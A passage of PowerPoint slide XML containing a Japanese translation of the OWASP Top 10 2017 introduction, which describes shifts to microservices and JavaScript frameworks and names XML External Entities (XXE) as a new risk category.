                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>年以上、世の中の変化は加速してきたため、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は変更を必要とされています。我々は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>をすっかりリファクタリングし、手法を改良し、新しいデータ募集のプロセスを活用し、コミュニティと協働し、リスクを評価し直し、それぞれのリスクを一から書き直し、一般に利用されているフレームワークや言語への参照を追加しています。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ここ数年で、アプリケーションの基本的な技術とアーキテクチャは大きく変わりました</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>従来のモノリシックアプリケーションから</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>node.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>や</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Spring Boot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>で書かれたマイクロサービスに置き換わっています。 マイクロサービスには独自のセキュリティ上の課題があります。例えば、マイクロサービス、コンテナ、機密管理などの間の信頼関係の確立、などがあります。インターネットからアクセス不可能だと期待されている古いコードは、現在、シングルページアプリケーション（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>SPA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>）やモバイルアプリケーションによって使いまくられている</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>や </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>RESTful Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>サービスの背後に居座っています。コードによるアーキテクチャの前提、たとえば信頼できる発信者のような前提はもはや有効ではありません。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Angular</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>や</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>などの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>JavaScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>フレームワークで書かれたシングルページアプリケーションによって、モジュール化された機能豊富なフロントエンドの開発ができるようになりました。従来、サーバー側で提供されてきた機能がクライアント側の機能に移るため、それはそれで独自のセキュリティ上の課題となります。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>JavaScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>はいまや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の主要言語であり、サーバー側で実行される</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>node.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>や、クライアントで動作する</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Bootstrap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Electron</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Angular</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>などの今どきの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>フレームワークで用いられています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>データに裏付けられた新しい問題</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>外部エンティティ参照 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、新しいカテゴリです。主にソースコード分析を行うセキュリティテストツール</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>から寄せられたデータが根拠となっています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>コミュニティにより裏付けられた新しい問題</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>コミュニティに向けて、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>つのセキュリティ上の弱点に関する見識を提供してくれるよう求めました。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>500</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
